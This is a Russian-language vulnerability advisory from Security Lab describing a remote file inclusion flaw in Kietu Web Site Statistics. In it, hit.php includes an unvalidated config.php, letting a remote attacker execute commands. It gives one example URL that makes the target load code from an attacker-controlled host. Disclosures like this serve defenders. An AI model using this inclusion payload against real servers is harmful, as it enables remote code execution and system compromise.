Security Lab

Выполнение произвольных команд в 'Kietu?'

Дата публикации:20.02.2003
Дата изменения:17.10.2006
Всего просмотров:1028
Опасность:
Высокая
Наличие исправления: Частично
Количество уязвимостей:1
CVE ID: Нет данных
Вектор эксплуатации: Удаленная
Воздействие: Компрометация системы
CWE ID: Нет данных
Наличие эксплоита: Нет данных
Уязвимые продукты: Kietu 2.x
Kietu 3.x
Описание: Уязвимость включения файла обнаружена в программе 'Kietu?' Web Site Statistics. Удаленный пользователь может выполнять произвольные команды на операционной системе.

Файл 'hit.php' включает файл 'config.php', не подтверждая правильности включенного файла. В результате удаленный атакующий может сконструировать URL, который ссылается на другой файл 'config.php', расположенный на удаленном сервере. Этот файл будет включен и выполнен целевым сервером. Пример:

http://[target]/hit.php?url_hit=http://[attacker]/
Уязвимость обнаружена в 'Kietu?' Web Site Statistics 2.0, 2.3
Ссылки: [VulnWatch] Kietu ( PHP )